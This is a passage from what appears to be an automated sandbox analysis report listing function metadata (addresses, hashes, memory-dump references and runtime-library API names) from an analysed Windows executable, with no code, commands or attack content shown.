                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                                                                              • Instruction ID: 6db4ff1f27ec64bd92dae87210117335b74618a059922738961de1e3414e52f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F61937391921A86E7789F26C0A537C37A1FB25B8DF141137FA0A86295CF3BE4A5C701
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE505308 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                                                                              • Instruction ID: 9c71e95fc0b5a4f23e5a4a0e7d7a960637bf7ba3aa5d1a2259ba25c2d5a9cdfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E61B57291D21A86E7758F2A80651BC37A5FB25B9DF641137FA0B86294CF3FE461CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5050F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                                                                              • Instruction ID: 9f89d40e2501f31ebf17be3137414b8f13fa8485bb8920b1cf4e0b0db5e546e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0561717290860B86E7B48E6A816537C37A5EF25B8CF541137FA4BC62D5CF2EE4A1C701
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5057B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-3916222277
                                                                                                                                                                                                                              • Opcode ID: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                                                                              • Instruction ID: cdcc027d904c14f9978437d4cd1f9e766b5f271bd6d52c25d044f043bd1606d7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1951867290C20A86F7758F2A806437C37A5FB25B9CF641537FA4BD6295CF2AE4A5C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52B120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                              • Opcode ID: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                                                                              • Instruction ID: 6684d977048d9c9fd1ffbaee1f231ef5dbe415b90a20cb474de92f7484cc4091
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e8504798e3096c9a346657a07f11e9947318bd45ce01f9eb4292907c059508d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96514C62B187CA49EB758F35945036D6B91E7B0BD4F088232E7AC87BD6CE2ED054C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE520BD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: !$fmod
                                                                                                                                                                                                                              • API String ID: 1757819995-3213614193
                                                                                                                                                                                                                              • Opcode ID: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                                                                              • Instruction ID: 37dec49a7155e3d8ed3b82f65fa3de16d8a87b174a92aac65741d4ab3b5c8967
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0718bf514110123fd14397416006eaade00b89320632af20748014d40c22490
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D51E621D2EB8E89EA735B3190217BDA798AFB63C4F409333F949719A1DF1E61734240
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4D8050 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::rsfun
                                                                                                                                                                                                                              • String ID: $$type parameter
                                                                                                                                                                                                                              • API String ID: 3764944385-1705267328
                                                                                                                                                                                                                              • Opcode ID: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                                                                              • Instruction ID: 5c363062c5fdcb38fa136e11f4db1cf23258af2a81741be0a2917962fcf8480e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b1de1a4cd9c0b01c76d9f2ae974172aeab0731a05d1d1179e6173c14350cda6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B851EE36618B4986DB60CB4AE49022EB7A0F7D8BA4F144622FE9D877A4DE7CD4558B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52CB88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                                                                              • Instruction ID: 1fb7395217d7ebd03a227666694aff3b1f66f6554a72d849d8ae2e026b9ca1a1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb5670a805d3fe430e447df02031e4798067a628be05abd275a1d0ed77e9e78f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6041CF22B18A8982DB208F25E8543AE67A0FBA87C4F844036EE4DC7799DF3DD511C740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52EE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: "$pow
                                                                                                                                                                                                                              • API String ID: 1757819995-713443511
                                                                                                                                                                                                                              • Opcode ID: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                                                                              • Instruction ID: f26ced717a5996cc37b1c4d129bb84a13d1ff714a5980d42b404bb769383aabf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0dc12af340543ad661d9082fe21a51273c15c51973181b3e1556972bb2ad2fd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A215072D1CAC887D371CF14E44066EBAA0FBFA384F101326F68946994CFBED1659B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5295DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareStringtry_get_function
                                                                                                                                                                                                                              • String ID: CompareStringEx
                                                                                                                                                                                                                              • API String ID: 3328479835-2590796910
                                                                                                                                                                                                                              • Opcode ID: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                                                                                                                                                                                              • Instruction ID: f3bd6086165947fd473fd71bc285a3de8e9506967e683e9cd45f04caaf2461b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c137282e7c86aa6c0bf46448e78d5a8f7a91d59841db637c6b4b72db4fd0273
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D113876A0CB8486D760CB16B4502AAB7A0FBE9BD0F144137EE8D83B59CF3CD4608B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52987C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DateFormattry_get_function
                                                                                                                                                                                                                              • String ID: GetDateFormatEx
                                                                                                                                                                                                                              • API String ID: 595753042-159735388
                                                                                                                                                                                                                              • Opcode ID: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                                                                                                                                                                                              • Instruction ID: 374f8a0754d9540db411c0a5bea3326f30d62bc8cfd1d19154cc5f4f8897de35
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af7e7c8f2fce8e6a76a9e8277ac3568be614c2fd3a1d6e1be1d9561cf776209e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38112175A08B8586E610CB59B4500AAB7A0FBEDBD0F544137FE8D83B59CE3CD5248B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5299B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FormatTimetry_get_function
                                                                                                                                                                                                                              • String ID: GetTimeFormatEx
                                                                                                                                                                                                                              • API String ID: 3261793192-1692793031
                                                                                                                                                                                                                              • Opcode ID: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
                                                                                                                                                                                                                              • Instruction ID: c6f48c68d79e8e8930262451681856717f346c28cdc0224ea35a4a4f7347b2bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47381a618a14b10dcba3f011165832e410438ae4806938e3760848f053d032c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60114F61A0C78586E710CB56B4100AEB7A0FBE8BD0F184137FE8D83B69CE7CD5608B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE525A30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                                                                                              • String ID: !$sqrt
                                                                                                                                                                                                                              • API String ID: 1757819995-799759792
                                                                                                                                                                                                                              • Opcode ID: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                                                                                                                                                                                              • Instruction ID: 068b187e0387f090736389de3c376abcf22b4407c6d6a9642ba7acc34a6ab146
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D11AB76D18B8982DE11CF15A55132E6262FFBA7E4F108332F96D066C8DF2DE0519A00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5014A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
